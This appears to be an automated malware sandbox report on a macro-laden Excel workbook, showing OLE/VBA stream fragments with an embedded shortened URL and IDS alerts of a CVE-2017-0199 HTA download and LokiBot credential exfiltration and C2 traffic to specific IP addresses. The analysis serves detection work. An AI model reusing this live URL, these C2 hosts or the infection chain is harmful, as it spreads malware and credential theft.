                                                                    Data ASCII:. . . . . g y M t H . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . C . x . d . O . H . 5 . ? . & . r . a . d . a . r . = . s . n . e . a . k . y . & . p . s . y . c . h . o . l . o . g . y . = . o . u . t . s . t . a . n . d . i . n . g . & . s . h . e . r . r . y . = . s . p . o . t . l . e . s . s . & . s . u . g . g . e . s . t . i . o . n . . . . . . . . \\ f . . V C . . T . = . o % % B . . d . [ M . . G t . . . . . ' u . . . . .
                                                                    Data Raw:01 00 00 02 e5 2e f9 67 79 4d 74 48 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 43 00 78 00 64 00 4f 00 48 00 35 00 3f 00 26 00 72 00 61 00 64 00 61 00 72 00 3d 00 73 00 6e 00 65 00 61 00 6b 00 79 00 26 00 70 00
                                                                    General
                                                                    Stream Path:Workbook
                                                                    CLSID:
                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                    Stream Size:330975
                                                                    Entropy:7.998619981607586
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . h 6 T . x ] y } . . + 3 . G . } x S 9 # . 9 i . . . . . . . . . . \\ . p . . ) < r T . 9 8 g . b 1 - : z f . 0 y ~ ; . . y W T . v = . % : * . . ~ . . K Y ] n . . I . 6 p . . . D . . y L W ' P . ] m Q B . . . a a . . . , F . . . = . . . V . . . . . Z s : ? 1 . * e f . . . D . . . . . . . . Y X . . . . 9 . . . y m . . . k = . . . V [ . . 2 * . , . B @ . . . . 6 . . . U g " . . . b . . . . . . . . . ( . . . 1 . . . . . g Z ? { . . . [ " E n ; . 1 . .
                                                                    Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 68 36 54 c8 a3 78 b5 8b d3 5d c1 ad ad c7 79 fe 7d 18 b7 a8 13 c5 f2 2b a0 ed 20 33 0a 89 a9 91 47 0e 9e 7d 80 ad 78 53 39 a4 e5 23 12 39 69 dd e1 00 02 00 b0 04 c1 00 02 00 a0 f6 e2 00 00 00 5c 00 70 00 ba a2 17 fc ad 29 e1 3c 72 54 0f ff 39 38 a6 c7 67 07 e6 d6 df 62 a5 a4 c2 31 a8 2d e5 3a
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                    CLSID:
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Stream Size:521
                                                                    Entropy:5.239208668467886
                                                                    Base64 Encoded:True
                                                                    Data ASCII:I D = " { 3 B 2 B 0 5 4 3 - D 6 0 8 - 4 9 F 8 - B 6 C 9 - 3 3 3 E 2 A C 0 9 1 D 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 4 1 4 3 8 A 0 A 8 E 0 A 8 E 0 A 8
                                                                    Data Raw:49 44 3d 22 7b 33 42 32 42 30 35 34 33 2d 44 36 30 38 2d 34 39 46 38 2d 42 36 43 39 2d 33 33 33 45 32 41 43 30 39 31 44 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:104
                                                                    Entropy:3.0488640812019017
                                                                    Base64 Encoded:False
                                                                    Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                    Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:2644
                                                                    Entropy:3.981744704608686
                                                                    Base64 Encoded:False
                                                                    Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                    Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:553
                                                                    Entropy:6.3652621927289355
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . O i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                    Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 c9 83 4f 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-20T07:56:32.963004+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.243.13680TCP
                                                                    2024-11-20T07:56:32.963009+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.243.13680192.168.2.2249164TCP
                                                                    2024-11-20T07:56:35.880012+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.243.13680TCP
                                                                    2024-11-20T07:56:35.880037+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.243.13680192.168.2.2249166TCP
                                                                    2024-11-20T07:56:57.248279+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916894.156.177.4180TCP
                                                                    2024-11-20T07:56:57.248279+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916894.156.177.4180TCP
                                                                    2024-11-20T07:56:57.248279+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916894.156.177.4180TCP
                                                                    2024-11-20T07:56:57.988472+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224916894.156.177.4180TCP
                                                                    2024-11-20T07:56:59.162067+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224916994.156.177.4180TCP
                                                                    2024-11-20T07:56:59.162067+01002025381ET MALWARE LokiBot Checkin1192.168.2.224916994.156.177.4180TCP
                                                                    2024-11-20T07:56:59.162067+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224916994.156.177.4180TCP
                                                                    2024-11-20T07:56:59.882200+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.224916994.156.177.4180TCP
                                                                    2024-11-20T07:57:00.038068+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917094.156.177.4180TCP
                                                                    2024-11-20T07:57:00.038068+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917094.156.177.4180TCP
                                                                    2024-11-20T07:57:00.038068+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917094.156.177.4180TCP
                                                                    2024-11-20T07:57:00.796820+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917094.156.177.4180TCP
                                                                    2024-11-20T07:57:00.796820+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917094.156.177.4180TCP
                                                                    2024-11-20T07:57:00.801702+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249170TCP
                                                                    2024-11-20T07:57:00.985981+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917194.156.177.4180TCP
                                                                    2024-11-20T07:57:00.985981+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917194.156.177.4180TCP
                                                                    2024-11-20T07:57:00.985981+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917194.156.177.4180TCP
                                                                    2024-11-20T07:57:01.712250+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917194.156.177.4180TCP
                                                                    2024-11-20T07:57:01.712250+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917194.156.177.4180TCP
                                                                    2024-11-20T07:57:01.717775+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249171TCP
                                                                    2024-11-20T07:57:01.990103+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917294.156.177.4180TCP
                                                                    2024-11-20T07:57:01.990103+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917294.156.177.4180TCP
                                                                    2024-11-20T07:57:01.990103+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917294.156.177.4180TCP
                                                                    2024-11-20T07:57:02.731919+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917294.156.177.4180TCP
                                                                    2024-11-20T07:57:02.731919+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917294.156.177.4180TCP
                                                                    2024-11-20T07:57:02.767336+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249172TCP
                                                                    2024-11-20T07:57:03.028263+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917394.156.177.4180TCP
                                                                    2024-11-20T07:57:03.028263+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917394.156.177.4180TCP
                                                                    2024-11-20T07:57:03.028263+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917394.156.177.4180TCP
                                                                    2024-11-20T07:57:03.741633+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917394.156.177.4180TCP
                                                                    2024-11-20T07:57:03.741633+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917394.156.177.4180TCP
                                                                    2024-11-20T07:57:03.841307+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249173TCP
                                                                    2024-11-20T07:57:04.458084+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917494.156.177.4180TCP
                                                                    2024-11-20T07:57:04.458084+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917494.156.177.4180TCP
                                                                    2024-11-20T07:57:04.458084+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917494.156.177.4180TCP
                                                                    2024-11-20T07:57:05.310719+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917494.156.177.4180TCP
                                                                    2024-11-20T07:57:05.310719+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917494.156.177.4180TCP
                                                                    2024-11-20T07:57:05.315581+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249174TCP
                                                                    2024-11-20T07:57:05.513581+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917694.156.177.4180TCP
                                                                    2024-11-20T07:57:05.513581+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917694.156.177.4180TCP
                                                                    2024-11-20T07:57:05.513581+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917694.156.177.4180TCP
                                                                    2024-11-20T07:57:06.374526+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917694.156.177.4180TCP
                                                                    2024-11-20T07:57:06.374526+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917694.156.177.4180TCP
                                                                    2024-11-20T07:57:06.379522+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249176TCP
                                                                    2024-11-20T07:57:07.053237+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917794.156.177.4180TCP
                                                                    2024-11-20T07:57:07.053237+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917794.156.177.4180TCP
                                                                    2024-11-20T07:57:07.053237+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917794.156.177.4180TCP
                                                                    2024-11-20T07:57:07.917653+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917794.156.177.4180TCP
                                                                    2024-11-20T07:57:07.917653+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917794.156.177.4180TCP
                                                                    2024-11-20T07:57:07.939075+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249177TCP
                                                                    2024-11-20T07:57:08.400152+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.4180TCP
                                                                    2024-11-20T07:57:08.400152+01002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.4180TCP
                                                                    2024-11-20T07:57:08.400152+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.4180TCP
                                                                    2024-11-20T07:57:09.108399+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917894.156.177.4180TCP
                                                                    2024-11-20T07:57:09.108399+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917894.156.177.4180TCP
                                                                    2024-11-20T07:57:09.113229+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249178TCP
                                                                    2024-11-20T07:57:09.288353+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.4180TCP
                                                                    2024-11-20T07:57:09.288353+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.4180TCP
                                                                    2024-11-20T07:57:09.288353+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.4180TCP
                                                                    2024-11-20T07:57:10.035512+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.4180TCP
                                                                    2024-11-20T07:57:10.035512+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.4180TCP
                                                                    2024-11-20T07:57:10.040363+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249182TCP
                                                                    2024-11-20T07:57:10.533829+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:10.533829+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:10.533829+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.112717+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249184192.3.243.13680TCP
                                                                    2024-11-20T07:57:11.261515+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.261515+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.4180TCP
                                                                    2024-11-20T07:57:11.268041+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249183TCP
                                                                    2024-11-20T07:57:11.427592+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:11.427592+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:11.427592+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.155460+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.155460+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.4180TCP
                                                                    2024-11-20T07:57:12.160366+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249185TCP
                                                                    2024-11-20T07:57:12.359101+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:12.359101+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:12.359101+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.065121+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.065121+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.4180TCP
                                                                    2024-11-20T07:57:13.070076+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249186TCP
                                                                    2024-11-20T07:57:13.469417+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:13.469417+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:13.469417+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.190184+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.190184+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.4180TCP
                                                                    2024-11-20T07:57:14.198397+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249187TCP
                                                                    2024-11-20T07:57:14.821226+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:14.821226+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:14.821226+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.539350+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.539350+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.4180TCP
                                                                    2024-11-20T07:57:15.544258+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249188TCP
                                                                    2024-11-20T07:57:15.719445+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:15.719445+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:15.719445+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.455575+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.455575+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.4180TCP
                                                                    2024-11-20T07:57:16.460615+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249189TCP
                                                                    2024-11-20T07:57:16.626398+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:16.626398+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:16.626398+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.347428+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.347428+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.4180TCP
                                                                    2024-11-20T07:57:17.352340+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249190TCP
                                                                    2024-11-20T07:57:17.507138+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:17.507138+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:17.507138+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.217076+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.217076+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.4180TCP
                                                                    2024-11-20T07:57:18.222070+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249191TCP
                                                                    2024-11-20T07:57:18.365734+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:18.365734+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:18.365734+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.096338+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.096338+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.4180TCP
                                                                    2024-11-20T07:57:19.101205+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249192TCP
                                                                    2024-11-20T07:57:19.253733+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:19.253733+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:19.253733+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.092497+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.092497+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.4180TCP
                                                                    2024-11-20T07:57:20.097314+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249193TCP
                                                                    2024-11-20T07:57:20.473746+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:20.473746+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:20.473746+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.192076+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.192076+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.4180TCP
                                                                    2024-11-20T07:57:21.197086+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249194TCP
                                                                    2024-11-20T07:57:21.599286+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:21.599286+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:21.599286+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.322789+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.322789+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.4180TCP
                                                                    2024-11-20T07:57:25.327626+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249195TCP
                                                                    2024-11-20T07:57:25.465376+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:25.465376+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:25.465376+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.325588+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.325588+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.4180TCP
                                                                    2024-11-20T07:57:26.330544+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249196TCP
                                                                    2024-11-20T07:57:26.474558+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:26.474558+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:26.474558+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.207355+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.207355+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.4180TCP
                                                                    2024-11-20T07:57:27.212143+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249197TCP
                                                                    2024-11-20T07:57:27.353742+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:27.353742+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:27.353742+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.068992+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.068992+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.4180TCP
                                                                    2024-11-20T07:57:28.073862+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249198TCP
